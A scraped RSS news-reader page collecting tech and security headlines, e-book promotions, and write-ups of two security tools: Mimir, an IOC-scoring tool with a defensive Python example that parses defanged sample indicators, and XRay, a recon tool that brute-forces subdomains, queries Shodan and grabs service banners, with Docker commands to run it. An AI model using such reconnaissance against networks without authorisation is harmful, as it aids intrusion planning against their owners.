News Reader

RSS tabs are below. Page last updated: 2025-11-20 23:47:07 GMT+0.

Tech RSS feeds

Below are tech sites.

Hackers Online Club (HOC)

Web Coding And Development All-in-One For Dummies ($25.99 Value) FREE for a Limited Time

Speak the languages that power the web.

With more high-paying web development jobs opening every day, people with coding and web/app building skills are having no problems finding employment.

If you’re a would-be developer looking to gain the know-how to build the interfaces, databases, and other features that run modern websites, web apps, and mobile apps, look no further. Web Coding & Development All-in-One For Dummies is your go-to interpreter for speaking the languages that handle those tasks.

Get started with a refresher on the rules of coding before diving into the languages that build interfaces, add interactivity to the web, or store and deliver data to sites. When you're ready, jump into guidance on how to put it all together to build a site or create an app.

Get the lowdown on coding basics:
  • Review HTML and CSS
  • Make sense of JavaScript, jQuery, PHP, and MySQL
  • Create code for web and mobile apps

There's a whole world of opportunity out there for developers, and this fast-track boot camp is here to help you acquire the skills you need to take your career to new heights!

Free offer expires 4/22/2020

Article link

Date of publish: Mon, 20 Apr 2020 06:25:00 +0000

Smart OSINT Collection of Common IOC (Indicator of Compromise) Types

This application is designed to assist security analysts and researchers with the collection and assessment of common IOC types. Accepted IOCs currently include IP addresses, domain names, URLs, and file hashes.

The project is named after Mimir, a figure in Norse mythology renowned for his knowledge and wisdom. The application aims to give you knowledge about IOCs and then add some "wisdom": it calculates a risk score per IOC, assigns a common malware family name to hash lookups based on reports from VirusTotal and OPSWAT, and uses machine learning tools to predict whether an IP, URL, or domain is likely to be malicious.

Base Collection

For network-based IOCs, Mimir gathers basic information including:
  • Whois
  • ASN
  • Geolocation
  • Reverse DNS
  • Passive DNS

Collection Sources

Some of these sources require an API key, and a few are only available with a paid account; the project tries to limit its reliance on paid services as much as possible.
  • PassiveTotal
  • VirusTotal
  • DomainTools
  • OPSWAT
  • Google SafeBrowsing
  • Shodan
  • PulseDive
  • CSIRTG
  • URLscan
  • HpHosts
  • Blacklist checks
  • Spam blacklist checks

Risk Scoring

The risk scoring works best when Mimir can gather a decent number of data points for an IOC: passive DNS, well-populated URL/domain results (communicating samples, associated samples, recent scan data, etc.). It also takes the ML maliciousness prediction into account.
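Before any of the lookups above can run, a collector has to recognise which of the four accepted IOC types it was handed (analysts paste defanged values like hxxp://evil[.]example), normalise it, and afterwards fold whatever the sources returned into one score. The block below is an added example of that front and back end, written for this page; it is not Mimir's code. The `SOURCE_WEIGHTS` table, the verdict scale (0 to 1 per source) and the sample indicators are all hypothetical, and the confidence value illustrates the point made above: a score built from few data points is reported as low-confidence rather than hidden.

```python
"""Added example: classify, refang and normalise an IOC string into the four
types an OSINT collector like Mimir accepts (IP, domain, URL, hash), then fold
per-source verdicts into one weighted risk score with a confidence value.
Illustrative code, not Mimir's own; SOURCE_WEIGHTS are hypothetical."""
import ipaddress
import re
from urllib.parse import urlsplit

# Hash type is inferred purely from hex length; anything else is not a hash.
HASH_LENGTHS = {32: "md5", 40: "sha1", 64: "sha256"}
_HEX = re.compile(r"^[0-9a-f]+$")
# Conservative hostname check: at least two labels, alphabetic TLD, <= 253 chars.
_DOMAIN = re.compile(
    r"^(?=.{1,253}$)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,63}$"
)


def refang(value: str) -> str:
    """Undo the defanging analysts use in reports: hxxp://, [.], (.), [:], [/]."""
    v = value.strip()
    v = re.sub(r"^hxxp", "http", v, flags=re.IGNORECASE)  # hxxps -> https too
    for defanged, real in (("[.]", "."), ("(.)", "."), ("[:]", ":"), ("[/]", "/")):
        v = v.replace(defanged, real)
    return v


def classify(value: str):
    """Return (ioc_type, normalised_value); ioc_type is None if unrecognised."""
    v = refang(value)
    low = v.lower()
    if len(low) in HASH_LENGTHS and _HEX.match(low):
        return HASH_LENGTHS[len(low)], low
    try:  # both IPv4 and IPv6; str() gives the canonical textual form
        return "ip", str(ipaddress.ip_address(v))
    except ValueError:
        pass
    if "://" in v:
        parts = urlsplit(v)
        if parts.scheme.lower() in ("http", "https", "ftp") and parts.hostname:
            # Scheme and host are case-insensitive; the path is not, so keep it.
            norm = parts._replace(scheme=parts.scheme.lower(),
                                  netloc=parts.netloc.lower()).geturl()
            return "url", norm
        return None, value
    host = low.rstrip(".")  # drop a trailing root dot
    if _DOMAIN.match(host):
        return "domain", host
    return None, value


# Hypothetical weights: how much each source's verdict moves the final score.
SOURCE_WEIGHTS = {
    "virustotal": 0.35,
    "opswat": 0.20,
    "passive_dns": 0.15,
    "blacklist": 0.15,
    "ml": 0.15,
}


def risk_score(findings: dict):
    """findings maps source name -> verdict in [0, 1] (None = source not queried).

    Returns (score 0-100, confidence 0-1). The score is a weighted mean over the
    sources that actually answered; confidence is the share of total weight
    those sources represent, so a score built from one lookup is flagged as weak.
    """
    observed = {s: v for s, v in findings.items()
                if s in SOURCE_WEIGHTS and v is not None}
    if not observed:
        return 0, 0.0
    weight_seen = sum(SOURCE_WEIGHTS[s] for s in observed)
    weighted = sum(SOURCE_WEIGHTS[s] * min(max(v, 0.0), 1.0)
                   for s, v in observed.items())
    confidence = weight_seen / sum(SOURCE_WEIGHTS.values())
    return round(weighted / weight_seen * 100), round(confidence, 2)


if __name__ == "__main__":
    # Constructed sample indicators, defanged as they would appear in a report.
    for raw in ("hxxp://evil[.]example/login", "192.168.1[.]1",
                "EVIL.example.", "d41d8cd98f00b204e9800998ecf8427e", "not an ioc"):
        print(raw, "->", classify(raw))
    print(risk_score({"virustotal": 0.9, "ml": 0.8}))  # (87, 0.5)
```

Unrecognised input is returned with type `None` rather than guessed, so a typo never turns into a paid API call, and the confidence value should be shown next to the score in any report so that a single-source 90 is not read the same as a five-source 90.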

Machine Learning Predictions

The machine learning prediction results come from the CSIRT Gadgets projects csirtg-domainsml-py, csirtg-ipsml-py, csirtg-urlsml-py.

Output

Mimir can write results in several forms, either as local file reports or by exporting to an external service:
  • stdout (console output): normalized result data, printed with headers and subheaders per module
  • JSON file: beautified output to a local file
  • Excel: multiple sheets per IOC type
  • MISP: commit new indicators
  • ThreatConnect: commit new indicators with confidence and threat ratings (optionally assign tags, a description, and a TLP setting)

Download Smart OSINT Collection

Article link

Date of publish: Fri, 31 Jan 2020 09:39:00 +0000

Cybersecurity: The Beginner's Guide ($29.99 Value) FREE For a Limited Time

Understand the nitty-gritty of Cybersecurity with ease

It's not a secret that there is a huge talent gap in the cybersecurity industry. Everyone is talking about it, including Forbes, TechRepublic, CSO Online, Dark Reading, and SC Magazine, among many others. Executives such as Satya Nadella, McAfee's CEO Chris Young, and Cisco's CIO Colin Seward shine a light on it from time to time.

This book puts together all the information you need about cybersecurity: why you should choose it, why it is needed, and how you can become part of the field and help fill the talent gap bit by bit.

Features include how to:

  • Align your security knowledge with industry-leading concepts and tools
  • Acquire the skills and certifications required to survive ever-changing market needs
  • Learn from industry experts to analyse, implement, and maintain a robust environment

By the end of this book, readers will be well versed in the security domain and capable of making the right choices in the cybersecurity field.


Free offer expires on 17 Dec 2019

Offered Free by: Packt


Article link

Date of publish: Wed, 04 Dec 2019 06:43:00 +0000

Hacker News: Front Page

France is taking state actions against GrapheneOS

Article URL: https://grapheneos.social/@GrapheneOS/115584160910016309

Comments URL: https://news.ycombinator.com/item?id=45999024

Points: 87

# Comments: 36

Article link

Date of publish: Thu, 20 Nov 2025 22:56:40 +0000

AI Is Writing Its Own Kernels, and They Are 17x Faster

Article URL: https://adrs-ucb.notion.site/autocomp

Comments URL: https://news.ycombinator.com/item?id=45998649

Points: 35

# Comments: 18

Article link

Date of publish: Thu, 20 Nov 2025 22:21:58 +0000

GitHut – Programming Languages and GitHub (2014)

Article URL: https://githut.info/

Comments URL: https://news.ycombinator.com/item?id=45998047

Points: 32

# Comments: 15

Article link

Date of publish: Thu, 20 Nov 2025 21:33:37 +0000

Latest Hacking News | Cyber Security News, Hacking Tools and Penetration Testing Courses

Mozilla Firefox 145 Rolls Out With Advanced Fingerprint Protection

Taking another leap towards securing users’ digital privacy, Mozilla rolls out Firefox 145 with enhanced…

Article link

Date of publish: Thu, 20 Nov 2025 11:06:54 +0000

Seraphic Becomes the First and Only Secure Enterprise Browser Solution to Protect Electron-Based Applications

When Language Speaks Faster Than We Can Type: The Rise of Smart Speech-to-Text Tools

If you pay attention to how people communicate now, it’s pretty clear that talking has…

Article link

Date of publish: Thu, 13 Nov 2025 17:10:27 +0000

Best Six Test Data Management Tools

Test data management (TDM) is the process of handling and preparing the data used for…

Article link

Date of publish: Thu, 13 Nov 2025 16:53:54 +0000

WhatsApp Rolls Out Passkey-Secured Backups On Android, iOS

After the recent update, WhatsApp users can experience passkey-secured backups for their conversations. WhatsApp has…

Article link

Date of publish: Thu, 06 Nov 2025 13:05:53 +0000

Aembit Introduces Identity and Access Management for Agentic AI

Silver Spring, Maryland, USA, 30th October 2025, CyberNewsWire

Article link

Date of publish: Thu, 30 Oct 2025 12:02:02 +0000

How Small Security Teams Can Improve Vulnerability Management

Small security teams are often putting out fires, and as a result, burning out fast.…

Article link

Date of publish: Wed, 29 Oct 2025 11:13:51 +0000

Microsoft October Patch Tuesday Is Huge With 170+ Fixes

Microsoft has rolled out a huge Patch Tuesday update bundle for October 2025, addressing 175…

Article link

Date of publish: Tue, 28 Oct 2025 10:00:38 +0000

nsKnox Launches Adaptive Payment Security™, Revolutionizing B2B Fraud Prevention by Solving the ‘Impossible Triangle’ of Speed, Certainty, and Effort

Microsoft Limits IE Mode In Edge Browser Citing Zero-Day Exploits

Microsoft recently announced changes to the Internet Explorer mode in Edge browsers, citing zero-day exploits…

Article link

Date of publish: Mon, 27 Oct 2025 11:14:02 +0000

Latest news

Amazon's 2025 Black Friday deals are shockingly good: Shop some of my favorites up to 60% off

Black Friday is a week away, but Amazon's Black Friday sale kicked off today. These are my favorite deals so far, like Govee outdoor lights for $200.

Article link

Date of publish: Thu, 20 Nov 2025 21:37:00 GMT

Can a Linux laptop really replace my MacBook? This one is surprisingly close

Tuxedo Computers' Infinity Book Pro 14 is a sleek laptop with Linux preinstalled. But its performance is backed up by some smart design choices.

Article link

Date of publish: Thu, 20 Nov 2025 21:00:34 GMT

How to pair two sets of AirPods to your iPhone at the same time (and why it's genius)

Stop sharing your AirPods when you can directly share your audio instead. Here's how to pair two sets to one device.

Article link

Date of publish: Thu, 20 Nov 2025 20:54:00 GMT

Everyone can use ChatGPT Group Chat now for free - here's how to try it

OpenAI's new feature enables up to 20 users to collaborate with the chatbot in a single, shared conversation.

Article link

Date of publish: Thu, 20 Nov 2025 20:51:00 GMT

Black Friday TV deals are live now with massive sales: Here are our 40+ top picks

Black Friday is just over a week away, and I'm tracking great deals on TVs and home theater equipment from Samsung, Sony, and more live.

Article link

Date of publish: Thu, 20 Nov 2025 20:44:00 GMT

The Kindle Scribe is a note taker's dream device, on sale ahead of Black Friday

Amazon's Kindle Scribe earned our Editor's Choice award for its excellent note-taking features and ease of use. Right now, it's on sale.

Article link

Date of publish: Thu, 20 Nov 2025 20:42:00 GMT

I found an AirTag alternative that beats the Bluetooth tracker in meaningful ways (including price)

Pebblebee's Clip 5 finder tag attaches to a keyring, works with iOS and Android, and gets loud.

Article link

Date of publish: Thu, 20 Nov 2025 20:40:00 GMT

Changing this one setting on my Android phone doubled the speed (literally)

A few taps and a swipe are all it takes to make your Android phone run in double time - sort of.

Article link

Date of publish: Thu, 20 Nov 2025 20:36:00 GMT

Google's Nano Banana image generator goes Pro - how it beats the original

The original Nano Banana generator went viral, and this one is even better. See what changed - and how to try it for free.

Article link

Date of publish: Thu, 20 Nov 2025 20:28:34 GMT

TikTok may have just fixed the two worst parts about social media today - here's how

Remember when social media was fun and exciting?

Article link

Date of publish: Thu, 20 Nov 2025 20:18:00 GMT

How much RAM does your Linux PC need in 2025? A distro veteran's expert advice

Forget the bare minimum: here's how much RAM you actually need to get the best performance out of your Linux system today.

Article link

Date of publish: Thu, 20 Nov 2025 20:00:38 GMT

What Linus Torvalds really thinks about AI and software development might surprise you

Linux's leader, Linus Torvalds, and his friend, Dirk Hohndel, discuss AI, Rust, and Linux's human side.

Article link

Date of publish: Thu, 20 Nov 2025 20:00:00 GMT

Should you take gaming on Chromebooks seriously? Nvidia's latest move says it all

New Chromebooks will come with the GeForce Now Fast Pass for a full year, alongside upgrades with the Blackwell RTX architecture.

Article link

Date of publish: Thu, 20 Nov 2025 19:57:00 GMT

You can't hide your Amazon orders in a shared account anymore - but here's a workaround

If you're ordering gifts from Amazon this holiday season, beware of this feature change.

Article link

Date of publish: Thu, 20 Nov 2025 19:52:00 GMT

Shop the best early Kindle deals for Black Friday 2025

We're keeping a close eye on the best early Black Friday Kindle deals, including discounts on the Colorsoft and the Kindle Scribe.

Article link

Date of publish: Thu, 20 Nov 2025 19:32:06 GMT

My 8 must-use Linux commands, and how they can make your life easier

Sure, using the Linux command line is optional. But these are commands I rely on every day, and you can benefit from them, too.

Article link

Date of publish: Thu, 20 Nov 2025 19:30:32 GMT

Bose QuietComfort Ultra 2 are my favorite travel headphones - especially at this price

The Bose QuietComfort Ultra 2 headphones are built for travel, thanks to a warm sound profile, a comfortable design, and an auto standby power feature.

Article link

Date of publish: Thu, 20 Nov 2025 19:27:08 GMT

After testing streaming devices for over a decade, this $19 Roku is the best deal I've seen

I've used the Roku Streaming Stick Plus for months, and it's a downright steal with this $19 Black Friday deal.

Article link

Date of publish: Thu, 20 Nov 2025 19:21:07 GMT

Best Buy's Black Friday sale has arrived - I hand-picked 30+ discounts live now

Best Buy's Black Friday sale starts today, and these are my favorite deals available now, like the AirPods Pro 3 for $219.

Article link

Date of publish: Thu, 20 Nov 2025 18:56:12 GMT

Shop the best early Apple Watch deals for Black Friday 2025

Shop these early Black Friday deals on last year's Apple Watch models and new models, including the new Series 11 and SE 3, a week before the big deals event.

Article link

Date of publish: Thu, 20 Nov 2025 18:43:48 GMT

NYT > Technology

The A.I. Boom Has Found Another Gear. Why Can’t People Shake Their Worries?

It is a time of superlatives in the tech industry, with historic profits, stock prices and deal prices. It’s enough to make some people very nervous.

Article link

Date of publish: Thu, 20 Nov 2025 23:19:08 +0000

To Meld A.I. With Supercomputers, National Labs Are Picking Up the Pace

A.I. has added urgency to the U.S. national laboratories that have been sites of cutting-edge scientific research, leading to deals with tech giants like Nvidia to speed up.

Article link

Date of publish: Thu, 20 Nov 2025 16:01:51 +0000

Trump Elevates Once-Fringe Meme Makers to the Mainstream

Right-wing users have tapped A.I. tools to promote President Trump’s agenda. He took notice.

Article link

Date of publish: Thu, 20 Nov 2025 18:40:55 +0000

Family Affair: Commerce Secretary’s Sons Cash In on A.I. Frenzy

Howard Lutnick is helping push data center projects. His family companies are profiting from them.

Article link

Date of publish: Thu, 20 Nov 2025 10:00:45 +0000

Yann LeCun, a Pioneering A.I. Scientist, Leaves Meta

Dr. LeCun’s departure follows a shake-up in Meta’s artificial intelligence efforts, as Mark Zuckerberg pushes his company to keep up in the tech race.

Article link

Date of publish: Wed, 19 Nov 2025 23:35:50 +0000

Nvidia Earnings Show Profit Jumped 65% to $31.9 Billion

The company, which makes the computer chips essential to the artificial intelligence boom, also said revenue in its recent quarter rose to $57 billion.

Article link

Date of publish: Thu, 20 Nov 2025 00:01:33 +0000

Saudi Arabia Backs Elon Musk’s xAI With Data Center Deal

Mr. Musk’s xAI will work with the Saudi artificial intelligence company Humain on a new data center, part of Crown Prince Mohammed bin Salman’s effort to diversify his kingdom’s economy.

Article link

Date of publish: Wed, 19 Nov 2025 22:02:37 +0000

Larry Summers Resigns From OpenAI’s Board

Mr. Summers departed the artificial intelligence company’s board after revelations of his communications with the disgraced financier Jeffrey Epstein.

Article link

Date of publish: Wed, 19 Nov 2025 19:57:35 +0000

Netherlands Hands Back Control of Chinese-Owned Chipmaker Nexperia

Uncertainty over the availability of the company’s chips, which are used in cars and electronics, had added to concerns of a global shortage.

Article link

Date of publish: Wed, 19 Nov 2025 14:10:28 +0000

How Trump and Nvidia’s C.E.O. Became Partners on the International Stage

Over the last 10 months, President Trump has become close with Jensen Huang, Nvidia’s chief executive, as the company’s chips have become a tool in trade and peace talks.

Article link

Date of publish: Wed, 19 Nov 2025 14:17:10 +0000

Trump Administration Gives Three Mile Island Nuclear Project $1 Billion Loan

The Pennsylvania site, shorthand for the dangers of nuclear power after a 1979 meltdown, is set for revival under a deal to power Microsoft data centers.

Article link

Date of publish: Wed, 19 Nov 2025 10:50:41 +0000

Europe’s Chip Dreams Confront Business Realities

European chipmakers need TSMC’s help to grow their own semiconductor supply chain, but the chip giant’s Taiwanese suppliers find Europe a tough place to do business.

Article link

Date of publish: Wed, 19 Nov 2025 16:39:40 +0000

In the A.I. Race, Chinese Talent Still Drives American Research

Although some Silicon Valley executives paint China as the enemy, Chinese brains continue to play a major role in U.S. research.

Article link

Date of publish: Thu, 20 Nov 2025 03:02:58 +0000

Driving an E.V. Across North Dakota? Thank the Standing Rock Tribe.

A tribally owned network of chargers will soon be complete, connecting reservations and bridging a gap in the Midwest.

Article link

Date of publish: Wed, 19 Nov 2025 02:20:32 +0000

How TikTok Helped Meta Land an Antitrust Victory

Silicon Valley has increasingly pointed at rapid digital changes to blunt government efforts to rein in its power.

Article link

Date of publish: Thu, 20 Nov 2025 22:08:30 +0000

Meta’s Victory Opens the Way for Silicon Valley to Go Deal Shopping

To avoid regulatory scrutiny, big tech companies had steered clear of buying start-ups outright. Meta’s antitrust win may change that thinking.

Article link

Date of publish: Wed, 19 Nov 2025 02:08:32 +0000

Meta Did Not Violate the Law When It Bought Instagram and WhatsApp, a Judge Rules

Meta’s acquisitions of Instagram and WhatsApp did not illegally stifle competition in social networking, a judge found, a major win for the tech giant.

Article link

Date of publish: Tue, 18 Nov 2025 20:39:24 +0000

Google Unveils Gemini 3, With Improved Coding and Search Abilities

The new artificial intelligence model is the second the company has released this year. OpenAI and Anthropic made similar updates a few months ago.

Article link

Date of publish: Tue, 18 Nov 2025 16:29:36 +0000

Google’s Gemini 3 Is Here: A Special Early Look

Maybe more than other model releases, this one seems to have the attention of Google’s competitors. Will it put the company at the top of the A.I. leaderboard?

Article link

Date of publish: Tue, 18 Nov 2025 16:03:59 +0000

Self-Driving Taxis Are Catching On. Are You Ready?

With the arrival of Amazon’s Zoox robot taxi in San Francisco to compete with Waymo, autonomous services are gaining momentum. But there are pros and cons.

Article link

Date of publish: Tue, 18 Nov 2025 14:00:15 +0000

A.I. Video Is Threatening Our Ability to Trust Documentaries

A combination of technological developments and market forces is undermining the trust between viewer and filmmaker. What’s at stake is history itself.

Article link

Date of publish: Tue, 18 Nov 2025 14:34:15 +0000

Europe Begins Rethinking Its Crackdown on Big Tech

European policymakers are crafting changes to scale back and simplify landmark rules for A.I. and data privacy, in a shift from an aggressive regulatory period.

Article link

Date of publish: Mon, 17 Nov 2025 15:49:31 +0000

We Can Now Track Individual Monarch Butterflies. It’s a Revelation.

Scientists used tiny new sensors to follow the insects on journeys that take thousands of miles to their winter colonies in Mexico.

Article link

Date of publish: Mon, 17 Nov 2025 22:23:22 +0000

Jeff Bezos Creates A.I. Start-Up Where He Will Be Co-Chief Executive

Called Project Prometheus, the company is focusing on artificial intelligence for the engineering and manufacturing of computers, automobiles and spacecraft.

Article link

Date of publish: Mon, 17 Nov 2025 19:03:53 +0000

How Fraudsters Use Cryptocurrency A.T.M.s to Target Victims

The kiosks, which resemble conventional A.T.M.s and convert cash into virtual currencies, are increasingly under scrutiny as a tool for scammers.

Article link

Date of publish: Mon, 17 Nov 2025 05:01:20 +0000

The Crypto Industry’s $28 Billion in ‘Dirty Money’

As President Trump has championed crypto and the industry has gone mainstream, funds from scammers and other criminal groups have flowed onto major crypto exchanges.

Article link

Date of publish: Mon, 17 Nov 2025 17:05:33 +0000

How Seattle’s The Stranger Became a Progressive Kingmaker

Endorsements from The Stranger have become a must-have for some politicians, who know to bring snacks to their meetings with the paper’s writers.

Article link

Date of publish: Wed, 19 Nov 2025 20:16:54 +0000

What’s a Digital Passport and How Does It Work?

Apple joined Google this week in allowing travelers to add their passports to their cellphone “wallets.” As the holiday travel season nears, here’s what you need to know.

Article link

Date of publish: Fri, 14 Nov 2025 17:57:17 +0000

Apple’s iPhone Pocket by Issey Miyake Is Confusing by Design

Decades after their founders connected, Apple and Issey Miyake released a collection of phone pouches that have some people baffled. They hope it will inspire creativity.

Article link

Date of publish: Fri, 14 Nov 2025 13:30:06 +0000

Data Centers in Space + A.I. Policy on the Right + A Gemini History Mystery

“As you may have noticed, it is not easy to build data centers here on Earth.”

Article link

Date of publish: Fri, 14 Nov 2025 12:00:03 +0000

Almost Everything About NASA’s ESCAPADE Mission to Mars Is Unusual

The ESCAPADE mission, which launched to space on a Blue Origin rocket on Thursday, breaks the mold of how planetary science missions typically come together.

Article link

Date of publish: Fri, 14 Nov 2025 17:13:07 +0000

BleepingComputer

Google exposes BadAudio malware used in APT24 espionage campaigns

China-linked APT24 hackers have been using a previously undocumented malware called BadAudio in a three-year espionage campaign that recently switched to more sophisticated attack methods. [...]

Article link

Date of publish: Thu, 20 Nov 2025 17:12:32 -0500

Hacker claims to steal 2.3TB data from Italian rail group, Almaviva

Data from Italy's national railway operator, the FS Italiane Group, has been exposed after a threat actor breached the organization's IT services provider, Almaviva. [...]

Article link

Date of publish: Thu, 20 Nov 2025 13:54:17 -0500

GlobalProtect VPN portals probed with 2.3 million scan sessions

A major spike in malicious scanning against Palo Alto Networks GlobalProtect portals has been detected, starting on November 14, 2025. [...]

Article link

Date of publish: Thu, 20 Nov 2025 12:08:55 -0500

Salesforce investigates customer data theft via Gainsight breach

Salesforce says it revoked refresh tokens linked to Gainsight-published applications while investigating a new wave of data theft attacks targeting customers. [...]

Article link

Date of publish: Thu, 20 Nov 2025 11:47:20 -0500

New SonicWall SonicOS flaw allows hackers to crash firewalls

American cybersecurity company SonicWall urged customers today to patch a high-severity SonicOS SSLVPN security flaw that can allow attackers to crash vulnerable firewalls. [...]

Article link

Date of publish: Thu, 20 Nov 2025 10:56:00 -0500

D-Link warns of new RCE flaws in end-of-life DIR-878 routers

D-Link is warning of three remotely exploitable command execution vulnerabilities that affect all models and hardware revisions of its DIR-878 router, which has reached end-of-service but is still available in several markets. [...]

Article link

Date of publish: Thu, 20 Nov 2025 10:38:56 -0500

Turn your Windows 11 migration into a security opportunity

Windows 11 migration is inevitable as Windows 10 support ends, and unsupported systems create major security and ransomware risks. Acronis explains how to use this migration to review backups, strengthen cybersecurity, and ensure data stays recoverable. [...]

Article link

Date of publish: Thu, 20 Nov 2025 10:05:15 -0500

TV streaming piracy service with 26M yearly visits shut down

Photocall, a TV piracy streaming platform with over 26 million users annually, has ceased operations following a joint investigation by the Alliance for Creativity and Entertainment (ACE) and DAZN. [...]

Article link

Date of publish: Thu, 20 Nov 2025 08:31:43 -0500

Crypto mixer founders sent to prison for laundering over $237 million

The founders of the Samourai Wallet (Samourai) cryptocurrency mixing service have been sent to prison for helping criminals launder over $237 million. [...]

Article link

Date of publish: Thu, 20 Nov 2025 05:49:37 -0500

Multi-threat Android malware Sturnus steals Signal, WhatsApp messages

A new Android banking trojan named Sturnus can capture communication from end-to-end encrypted messaging platforms like Signal, WhatsApp, and Telegram, as well as take complete control of the device. [...]

Article link

Date of publish: Thu, 20 Nov 2025 05:00:00 -0500

OpenAI says its latest GPT-5.1 Codex can code independently for hours

OpenAI has started rolling out GPT-5.1-Codex-Max on Codex, with better performance on coding tasks. [...]

Article link

Date of publish: Wed, 19 Nov 2025 19:00:00 -0500

Sneaky2FA PhaaS kit now uses redteamers' Browser-in-the-Browser attack

Sneaky2FA, a phishing-as-a-service (PhaaS) kit popular among cybercriminals, has added Browser-in-the-Browser (BitB) capabilities, giving its "customers" the option to launch highly deceptive attacks. [...]

Article link

Date of publish: Wed, 19 Nov 2025 16:59:46 -0500

Google's Gemini 3 is living up to the hype and creating games in one shot

Google's Gemini 3 is finally here, and we're impressed with the results, but it still does not adhere to my requests as well as Claude Code. [...]

Article link

Date of publish: Wed, 19 Nov 2025 15:39:28 -0500

Hackers Online Club (HOC)

Web Coding And Development All-in-One For Dummies ($25.99 Value) FREE for a Limited Time


"Web Coding And Development All-in-One For Dummies ($25.99 Value) FREE for a Limited Time"


Peak the languages that power the web.


With more high-paying web development jobs opening every day, people with coding and web/app building skills are having no problems finding employment.

If you’re a would-be developer looking to gain the know-how to build the interfaces, databases, and other features that run modern websites, web apps, and mobile apps, look no further. Web Coding & Development All-in-One For Dummies is your go-to interpreter for speaking the languages that handle those tasks.

Get started with a refresher on the rules of coding before diving into the languages that build interfaces, add interactivity to the web, or store and deliver data to sites. When you're ready, jump into guidance on how to put it all together to build a site or create an app.

Get the lowdown on coding basics
  • Review HTML and CSS
  • Make sense of JavaScript, jQuery, PHP, and MySQL
  • Create code for web and mobile apps

There’s a whole world of opportunity out there for developers—and this fast-track boot camp is here to help you acquire the skills you need to take your career to new heights!

Free offer expires 4/22/2020

Article link

Date of publish: Mon, 20 Apr 2020 06:25:00 +0000

Smart OSINT Collection of Common IOC Types


Smart OSINT Collection of Common IOC (Indicator of compromise) Types


This application is designed to assist security analysts and researchers with the collection and assessment of common IOC types. Accepted IOCs currently include IP addresses, domain names, URLs, and file hashes.

The title of this project is named after Mimir, a figure in Norse mythology renowned for his knowledge and wisdom. This application aims to provide you knowledge into IOCs and then some added "wisdom" by calculating risk scores per IOC, assigning a common malware family name to hash lookups based off of reports from VirusTotal and OPSWAT, and leveraging machine learning tools to determine if an IP, URL, or domain is likely to be malicious.

Base Collection

For network-based IOCs, Mimir gathers basic information including:
  • Whois
  • ASN
  • Geolocation
  • Reverse DNS
  • Passive DNS

Collection Sources

Some of these sources require an API key, and a few are only available with a paid account; reliance on paid services has been kept to a minimum.
  • PassiveTotal
  • VirusTotal
  • DomainTools
  • OPSWAT
  • Google SafeBrowsing
  • Shodan
  • PulseDive
  • CSIRTG
  • URLscan
  • HpHosts
  • Blacklist checks
  • Spam blacklist checks

Risk Scoring

The risk scoring works best when Mimir can gather a decent number of data points for an IOC: passive DNS and well-populated URL/domain results (communicating samples, associated samples, recent scan data, etc.). It also takes the ML maliciousness prediction result into account.

Machine Learning Predictions

The machine learning prediction results come from the CSIRT Gadgets projects csirtg-domainsml-py, csirtg-ipsml-py and csirtg-urlsml-py.

Output

Mimir offers results output in various options including local file reports or exporting the results to an external service.

stdout (console output)
normalizes result data, printed with headers and subheaders per module

JSON file
beautified output to local file

Excel
uses multiple sheets per IOC type

MISP
commit new indicators

ThreatConnect
commit new indicators with confidence and threat ratings (optionally assign tags, a description, and a TLP setting)

Download Smart OSINT Collection

Article link

Date of publish: Fri, 31 Jan 2020 09:39:00 +0000

Cybersecurity- The Beginner's Guide ($29.99 Value) FREE For a Limited Time




Understand the nitty-gritty of Cybersecurity with ease


It's not a secret that there is a huge talent gap in the cybersecurity industry. Everyone is talking about it, including the prestigious Forbes Magazine, Tech Republic, CSO Online, DarkReading, and SC Magazine, among many others. Additionally, Fortune CEOs like Satya Nadella, McAfee's CEO Chris Young and Cisco's CIO Colin Seward shine a light on it from time to time.

This book puts together all the available information about cybersecurity: why you should choose it, the need for cybersecurity, and how you can be part of it and help fill the cybersecurity talent gap bit by bit.

Features include how to:

  • Align your security knowledge with industry leading concepts and tools
  • Acquire required skills and certifications to survive the ever changing market needs
  • Learn from industry experts to analyse, implement, and maintain a robust environment

By the end of this book, readers will be well-versed with the security domain and will be capable of making the right choices in the cybersecurity field.


Free offer expires on 17 Dec 2019

Offered Free by: Packt


Article link

Date of publish: Wed, 04 Dec 2019 06:43:00 +0000

Best Practices For Protecting Against Phishing, Ransomware and Email Fraud




Osterman Research conducted a survey among corporate decision makers in early 2018 and found that nearly 28% of those organizations had experienced a phishing attack that was successful in infecting their networks with malware.

Over 17% of organizations had email as part of a CEO Fraud/BEC attack that successfully tricked one or more of their senior executives in the last 12 months. Don’t let this happen to your organization.

Download the Osterman Research Whitepaper, Best Practices for Protecting Against Phishing, Ransomware and Email Fraud, and learn ten best practices you should consider to better protect your systems and network, train your users to be security-aware, and safeguard your organization’s sensitive and confidential data from phishing attacks, ransomware, and CEO Fraud.

Article link

Date of publish: Mon, 25 Nov 2019 07:46:00 +0000

XRay - Using For Recon Mapping And OSINT Suite


XRay is a tool for recon, mapping and OSINT gathering from public networks.

Its goal is to automate some of the initial tasks of information gathering and network mapping.

How Does it Work?

XRay is a very simple tool, it works this way:
  1. It'll bruteforce subdomains using a wordlist and DNS requests.
  2. For every subdomain/ip found, it'll use Shodan to gather open ports and other intel.
  3. If a ViewDNS API key is provided, for every subdomain historical data will be collected.
  4. For every unique IP address, and for every open port, it'll launch specific banner grabbers and info collectors.
  5. Eventually the data is presented to the user on the web ui.

Grabbers and Collectors

  • HTTP Server, X-Powered-By and Location headers.
  • HTTP and HTTPS robots.txt disallowed entries.
  • HTTPS certificates chain ( with recursive subdomain grabbing from CN and Alt Names ).
  • HTML title tag.
  • DNS version.bind. and hostname.bind. records.
  • MySQL, SMTP, FTP, SSH, POP and IRC banners.

Notes

Shodan API Key

The shodan.io API key parameter ( -shodan-key KEY ) is optional; however, if it is not specified, no service fingerprinting will be performed and a lot less information will be shown (basically it will just be DNS subdomain enumeration).

ViewDNS API Key

If a ViewDNS API key parameter ( -viewdns-key KEY ) is passed, domain historical data will also be retrieved.

Anonymity and Legal Issues

The software will rely on your main DNS resolver in order to enumerate subdomains, also, several connections might be directly established from your host to the computers of the network you're scanning in order to grab banners from open ports. Technically, you're just connecting to public addresses with open ports (and there's no port scanning involved, as such information is grabbed indirectly using Shodan API), but you know, someone might not like such behaviour.

Building a Docker image

To build a Docker image with the latest version of XRay:

git clone https://github.com/evilsocket/xray.git
cd xray
docker build -t xraydocker .

Once built, XRay can be started within a Docker container using the following:

docker run --rm -it -p 8080:8080 xraydocker xray -address 0.0.0.0 -shodan-key shodan_key_here -domain example.com 

